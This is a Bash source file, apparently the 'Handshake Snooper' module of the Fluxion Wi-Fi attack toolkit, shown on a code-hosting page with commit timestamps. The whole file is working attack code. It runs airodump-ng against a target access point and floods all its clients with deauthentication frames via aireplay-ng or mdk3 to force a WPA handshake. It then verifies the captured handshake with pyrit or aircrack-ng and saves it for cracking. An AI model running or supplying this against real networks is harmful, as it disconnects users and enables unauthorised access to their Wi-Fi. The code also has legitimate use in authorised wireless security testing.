fluxion/attacks/Handshake Snooper/attack.sh

211 lines
6.3 KiB
Bash
Raw Normal View History

#!/bin/bash
########################### < Handshake Snooper Parameters > ###########################
HandshakeSnooperState="Not Ready"
################################# < Handshake Snooper > ################################
function handshake_verifier_daemon() {
if [ ${#@} -lt 5 ]; then return 1; fi
handshakeVerifierState="running"
function handle_verifier_abort() {
handshakeVerifierState="aborted"
}
trap handle_verifier_abort SIGABRT
source lib/HashUtils.sh
touch $FLUXIONWorkspacePath/result.txt
echo "Looking for handshake:" > $FLUXIONWorkspacePath/result.txt
echo "" >> $FLUXIONWorkspacePath/result.txt
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#FF0000" -title "UI for handshake" -e "while (true);do clear;cat $FLUXIONWorkspacePath/result.txt; sleep 1;done" &
local handshakeCheckResult=1 # Assume invalid
while [ $handshakeCheckResult -ne 0 -a "$handshakeVerifierState" = "running" ]; do
sleep 3
pyrit -r "$4" -o "${4/.cap/-clean.cap}" stripLive
hash_check_handshake "$3" "${4/.cap/-clean.cap}" "${@:5:2}"
handshakeCheckResult=$?
echo -n "." >> $FLUXIONWorkspacePath/result.txt
done
# If handshake didn't pass verification, it was aborted.
if [ $handshakeCheckResult -ne 0 ]; then return 1; fi
2017-08-09 17:36:23 -06:00
# Assure we've got a directory to store hashes into.
local hashDirectory=$(dirname "$2")
if [ ! -d "$hashDirectory" ]; then
mkdir -p "$hashDirectory"
fi
# Custom print for ui
echo "+" >> $FLUXIONWorkspacePath/result.txt
echo "" >> $FLUXIONWorkspacePath/result.txt
echo "Handshake was found !" >> $FLUXIONWorkspacePath/result.txt
2017-08-09 17:36:23 -06:00
# Move handshake to storage if one was acquired.
mv "${4/.cap/-clean.cap}" "$2"
# Signal parent process the verification terminated.
kill -s SIGABRT $1
}
function handshake_stop_verifier() {
if [ "$HANDSHAKEVerifierPID" ]; then
kill -s SIGABRT $HANDSHAKEVerifierPID &> $FLUXIONOutputDevice
killall xterm
fi
HANDSHAKEVerifierPID=""
}
function handshake_start_verifier() {
handshake_verifier_daemon $$ \
"$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" \
"$HANDSHAKEVerifier" "$FLUXIONWorkspacePath/capture/dump-01.cap" \
"$APTargetSSID" "$APTargetMAC" &> $FLUXIONOutputDevice &
HANDSHAKEVerifierPID=$!
}
function handshake_stop_deauthenticator() {
if [ "$HANDSHAKEDeauthenticatorPID" ]; then
kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice
fi
HANDSHAKEDeauthenticatorPID=""
}
function handshake_start_deauthenticator() {
if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi
handshake_stop_deauthenticator
# Prepare deauthenticators
case "$HANDSHAKEMethod" in
"$HandshakeSnooperMdk3MethodOption") echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst
esac
# Start deauthenticators.
case "$HANDSHAKEMethod" in
2017-11-26 10:36:47 -07:00
"$HandshakeSnooperAireplayMethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
aireplay-ng --deauth=9999999999 -a $APTargetMAC --ignore-negative-one $WIMonitor &
HANDSHAKEDeauthenticatorPID=$!;;
"$HandshakeSnooperMdk3MethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel &
HANDSHAKEDeauthenticatorPID=$!;;
esac
}
function handshake_stop_captor() {
if [ "$HANDSHAKECaptorPID" ]; then
kill $HANDSHAKECaptorPID &> $FLUXIONOutputDevice
fi
HANDSHAKECaptorPID=""
}
function handshake_start_captor() {
if [ "$HANDSHAKECaptorPID" ]; then return 0; fi
handshake_stop_captor
xterm -hold -title "Handshake Captor (CH $APTargetChannel)" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e \
airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor &
echo -e "$FLUXIONVLine Captor process is starting, please wait..."
while [ ! "$HANDSHAKECaptorPID" ]; do
# Here, we'll wait for the airodump-ng PID, since we want to leave the xterm open.
# This is because we need to have a method of notifying the user the hash is captured.
# Once the hash is captured, we can terminate the captor and the xterm will freeze.
HANDSHAKECaptorPID=$(ps a | awk '$5~/^airodump-ng/ && $8~/'"$APTargetMAC"'/{print $1}')
sleep 1
done
}
function handshake_unset_method() {
HANDSHAKEMethod=""
}
function handshake_set_method() {
if [ "$HANDSHAKEMethod" ]; then return 0; fi
handshake_unset_method
local methods=("$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" "$HandshakeSnooperMdk3MethodOption" "$FLUXIONGeneralBackOption")
io_query_choice "$HandshakeSnooperMethodQuery" methods[@]
HANDSHAKEMethod=$IOQueryChoice
echo
if [ "$HANDSHAKEMethod" = "$FLUXIONGeneralBackOption" ]; then
handshake_unset_method
return 1
fi
}
function handshake_unset_verifier() {
HANDSHAKEVerifier=""
}
function handshake_set_verifier() {
if [ "$HANDSHAKEVerifier" ]; then return 0; fi
local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption")
io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@]
echo
case "$IOQueryChoice" in
"$FLUXIONHashVerificationMethodPyritOption") HANDSHAKEVerifier="pyrit";;
"$FLUXIONHashVerificationMethodAircrackOption") HANDSHAKEVerifier="aircrack-ng";;
"$FLUXIONGeneralBackOption")
handshake_unset_verifier
handshake_unset_method
return 1;;
esac
}
function unprep_attack() {
HandshakeSnooperState="Not Ready"
handshake_unset_verifier
handshake_unset_method
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"
}
function prep_attack() {
mkdir -p "$FLUXIONWorkspacePath/capture"
while true; do
handshake_set_method; if [ $? -ne 0 ]; then break; fi
handshake_set_verifier; if [ $? -ne 0 ]; then continue; fi
HandshakeSnooperState="Ready"
break
done
# Check for handshake abortion.
if [ "$HandshakeSnooperState" = "Not Ready" ]; then
unprep_attack
return 1;
fi
}
function stop_attack() {
handshake_stop_deauthenticator
handshake_stop_verifier
handshake_stop_captor
handshake_unset_verifier
}
# Parameters: path, SSID, MAC
function start_attack() {
handshake_start_captor
handshake_start_deauthenticator
handshake_start_verifier
}
# FLUXSCRIPT END